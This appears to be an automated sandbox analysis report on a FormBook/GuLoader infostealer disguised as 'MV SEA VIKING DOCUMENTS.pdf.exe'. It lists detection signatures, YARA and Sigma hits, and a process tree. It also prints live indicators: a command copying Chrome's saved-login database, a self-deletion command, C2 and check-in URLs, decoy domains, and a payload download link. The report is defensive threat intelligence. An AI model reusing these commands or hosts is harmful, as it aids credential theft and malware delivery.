Windows Analysis Report
MV SEA VIKING DOCUMENTS.pdf.exe

Overview

General Information

Sample Name:MV SEA VIKING DOCUMENTS.pdf.exe
Analysis ID:575819
MD5:319860d181378bf868e4deedcf5fbfb6
SHA1:cf91efda8bdba4674cb72d33ce391241ec4b9678
SHA256:58f1715336d2b7478c4539589dfc2065b3201df5505756474e00636b432cb378

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Sample uses process hollowing technique
Writes to foreign memory regions
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • MV SEA VIKING DOCUMENTS.pdf.exe (PID: 8400 cmdline: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
    • MV SEA VIKING DOCUMENTS.pdf.exe (PID: 8720 cmdline: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
      • explorer.exe (PID: 4908 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • chkdsk.exe (PID: 2576 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
          • cmd.exe (PID: 3396 cmdline: /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 4864 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • firefox.exe (PID: 5828 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
        • shmhprg0nvltzt.exe (PID: 4468 cmdline: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe MD5: 319860D181378BF868E4DEEDCF5FBFB6)
          • shmhprg0nvltzt.exe (PID: 3436 cmdline: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe MD5: 319860D181378BF868E4DEEDCF5FBFB6)
        • shmhprg0nvltzt.exe (PID: 5244 cmdline: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
        • shmhprg0nvltzt.exe (PID: 1648 cmdline: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
  • cleanup
Source | Rule | Description | Author | Strings
0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x6ad9:$sqlite3step: 68 34 1C 7B E1
      • 0x6bec:$sqlite3step: 68 34 1C 7B E1
      • 0x6b08:$sqlite3text: 68 38 2A 90 C5
      • 0x6c2d:$sqlite3text: 68 38 2A 90 C5
      • 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x6c43:$sqlite3blob: 68 53 D8 7F 8C

      System Summary

      Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine|base64offset|contains: H@, Image: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, NewProcessName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, OriginalFileName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ParentImage: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentProcessId: 8400, ProcessCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ProcessId: 8720
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\chkdsk.exe, ProcessId: 2576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1BIHHVSHQZC
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe\1, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 4908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a
      Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine|base64offset|contains: H@, Image: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, NewProcessName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, OriginalFileName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ParentImage: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentProcessId: 8400, ProcessCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ProcessId: 8720

      AV Detection

      Source: http://www.waktuk.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.rsxrsh.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.noireimpactcollective.net/be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfuAvira URL Cloud: Label: malware
      Source: https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2Avira URL Cloud: Label: malware
      Source: www.istemnetwork.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.josiemaran-supernatural.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.buresdx.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.noireimpactcollective.net/be4o/Avira URL Cloud: Label: malware
      Source: http://www.rsxrsh.com/be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmLAvira URL Cloud: Label: malware
      Source: http://www.buresdx.com/be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.istemnetwork.com/be4o/"], "decoy": ["neonewway.club", "kuanghong.club", "7bkj.com", "ooo-club.com", "kamchatka-agency.com", "sjsndtvitzru.mobi", "noireimpactcollective.net", "justbe-event.com", "easypeasy.community", "southcoast.glass", "janhenningsen.com", "jmxyjj.com", "tarihibilet.com", "nagradi7.com", "percentrostered.net", "certvaxid.com", "kingseafoodsydney.com", "blacksheepwalk.com", "waktuk.com", "inteligenciaenrefrigeracion.com", "marvinhull.com", "fikretbayrakdar.com", "rsxrsh.com", "vastukalabid.com", "belindahulett.com", "aibet888.club", "icarus-groupe.com", "vendasdigitaisonline.com", "fairytalepageants.com", "imaginativeprint.com", "quanqiu55555.com", "owensigns.com", "kaikkistore.com", "dreamintelligent.com", "piqqekqqbpjpajbzvvfqapwr.store", "mariachinuevozacatecas24-7.com", "glenndcp.com", "vaughnediting.com", "10dian-3.com", "buresdx.com", "itservon.com", "buyingusedfurniture.com", "elektropanjur.com", "logotzo.com", "eaglesaviationexperience.com", "antoniopasciuti.com", "personas1web.com", "hvbatterystore.com", "ksustudyabroad.com", "4huav946.com", "gojajix.xyz", "kennycheng.tech", "traditionnevertrend.com", "mytrainermatrix.online", "basculasperu.com", "eljkj.com", "teleconstructiongroup.com", "28682df.com", "altimiravet.com", "worldplantaward.com", "mydxza.com", "josiemaran-supernatural.com", "brainymortgage.info", "diffamr.net"]}
      Source: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED"}
      Source: MV SEA VIKING DOCUMENTS.pdf.exeReversingLabs: Detection: 13%
      Source: Yara matchFile source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exeReversingLabs: Detection: 13%
      Source: 33.0.firefox.exe.2234796c.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 21.2.chkdsk.exe.594796c.3.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 33.0.firefox.exe.2234796c.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 33.2.firefox.exe.2234796c.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: chkdsk.pdbGCTL source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: cliconfg.pdb source: cliconfg.dll.0.dr
      Source: Binary string: mshtml.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: raschapext.pdb source: raschapext.dll.0.dr
      Source: Binary string: raschapext.pdbGCTL source: raschapext.dll.0.dr
      Source: Binary string: chkdsk.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: usp10.pdb source: usp10.dll.0.dr
      Source: Binary string: ProvMigrate.pdb source: provmigrate.dll.0.dr
      Source: Binary string: mshtml.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cliconfg.pdbGCTL source: cliconfg.dll.0.dr
      Source: Binary string: ProvMigrate.pdbGCTL source: provmigrate.dll.0.dr
      Source: Binary string: usp10.pdbGCTL source: usp10.dll.0.dr
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA90 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA89 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA89
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,30_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00406873 FindFirstFileW,FindClose,30_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040290B FindFirstFileW,30_2_0040290B
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,34_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00406873 FindFirstFileW,FindClose,34_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040290B FindFirstFileW,34_2_0040290B

      Networking

      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 79.110.48.188:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 79.110.48.188:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 79.110.48.188:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49785 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49785 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49785 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49798 -> 162.0.209.21:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49798 -> 162.0.209.21:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49798 -> 162.0.209.21:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49800 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49800 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49800 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49832 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49832 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49832 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 154.214.67.115:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 154.214.67.115:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 154.214.67.115:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49852 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49852 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49852 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 217.160.0.98:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 217.160.0.98:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 217.160.0.98:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49865 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49865 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49865 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 45.195.115.71:80
      Source: unknownDNS query: name: www.logotzo.com
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED
      Source: Malware configuration extractorURLs: www.istemnetwork.com/be4o/
      Source: unknownDNS traffic detected: query: www.kuanghong.club replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: www.icarus-groupe.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.piqqekqqbpjpajbzvvfqapwr.store replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.justbe-event.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.logotzo.com replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: www.personas1web.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.istemnetwork.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.percentrostered.net replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.marvinhull.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.owensigns.com replaycode: Name error (3)
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox View, ASN Name: COGENT-174US
      Source: Joe Sandbox View, ASN Name: GOOGLE-2US
      Source: Joe Sandbox View, IP Address: 64.32.22.102
      Source: unknown, Network traffic detected: DNS query count 35
      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comeHost_
      Source: explorer.exe, 00000010.00000000.2466445411.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2707742528.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2577458976.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2518578539.000000000D574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
